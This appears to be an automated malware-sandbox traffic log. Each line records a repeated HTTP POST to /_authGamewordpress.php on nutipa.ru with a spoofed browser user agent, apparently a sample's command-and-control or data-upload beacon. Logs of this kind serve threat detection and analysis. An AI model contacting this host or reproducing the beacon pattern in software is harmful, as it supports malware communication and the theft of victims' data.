Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1396Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continue
